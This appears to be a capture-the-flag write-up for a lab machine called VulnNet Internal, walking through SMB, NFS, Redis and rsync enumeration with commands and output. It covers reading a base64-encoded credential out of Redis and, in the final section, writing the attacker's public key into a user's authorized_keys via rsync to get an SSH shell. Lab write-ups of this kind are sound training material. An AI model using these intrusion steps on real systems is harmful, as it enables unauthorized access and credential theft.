Skip to content

There are a lot of services to discover and dive into it . We will discuss and see how to enumerate and exploit them.

Server Message Block (SMB)

Listing anony-available shares

❯ smbmap -H 10.10.60.45
[+] Guest session       IP: 10.10.60.45:445 Name: 10.10.60.45                                       
        Disk                                                    Permissions Comment
    ----                                                    ----------- -------
    print$                                              NO ACCESS   Printer Drivers
    shares                                              READ ONLY   VulnNet Business Shares
    IPC$                                                NO ACCESS   IPC Service (vulnnet-internal server (Samba, Ubuntu))

Anonymous Access

Try anonymous access on SMB share “shares” using the following command. 

smbclient //$target/shares -N


smb: \> ls  
.  
..  
temp  
data  
smb: \>

Network File System (NFS)

Show available disks

Use showmount program to see available disks. 

❯ sudo showmount -e $target  
[sudo] password for sak:  
Export list for 10.10.10.1:  
/opt/conf *

Mounting

Create a temporary directory and mount the NFS share by running the following command as root or user with sudo privileges 

mkdir /tmp/mount1
sudo mount -t nfs 10.10.0.10:/opt/conf /tmp/mount1
cd /tmp/mount1
ls

Redis

Redis offers a fast, in-memory data store to power live streaming use cases.

❯ redis-cli -h $target -p 6379 -a [password]  
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.  
10.10.96.14:6379>

To get all the keys in redis, we can run the command KEYS *. 

10.10.96.14:6379> KEYS * 
1) "int" 2) "internal flag" 3) "authlist" 4) "tmp" 5) "marketlist"
10.10.96.14:6379>

Our flag is present in the file named internal flag and we can read it using the command: 

GET "internal flag"

Auth Key

To find the type of a key in redis we run the command "type "

10.10.60.45:6379> type authlist
list

We found that authlist is a list type key and to read it's value we can run the following command:

10.10.60.45:6379> lrange authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4**************************"
.
.
.

After decoding this base64 message, we found the credentials for rsync.

rsync

rsync is typically used for synchronizing files and directories between two different systems.

Enumeration

To get name of all the files or directories we can use the following command:

❯ rsync 10.10.60.45::
files           Necessary home interaction

To interact with files directory we can run the command rsync 10.10.60.45::files but even after providing the correct password it says error auth failed. So next we can try to copy all the files using the following command:

rsync -av rsync://rsync-connect@10.10.60.45/files user_files
Password: 
receiving incremental file list
created directory user_files

After the command is executed, all the files will be copied in user_files directory in our local system and there we found the user flag.

User Shell via SSH Key Manipulation

While enumerating sys-internal files and directories, we found .ssh directory and we know that using rsync we can upload files. So we upload our id_rsa.pub to the .ssh directory using the command shown below.

❯ rsync -av /home/goliboi/.ssh/id_rsa.pub rsync://rsync-connect@10.10.60.45/files/sys-internal/.ssh/authorized_keys
Password:
.
.
.
sent 661 bytes  received 144 bytes  84.74 bytes/sec
total size is 565  speedup is 0.70

Now we can easily get user shell access by using id_rsa private key.

❯ sudo ssh sys-internal@10.10.60.45 -i /home/goliboi/.ssh/id_rsa
[sudo] password for goliboi: .
.
.
.
sys-internal@vulnnet-internal:~$ id
uid=1000(sys-internal) gid=1000(sys-internal) groups=1000(sys-internal),24(cdrom)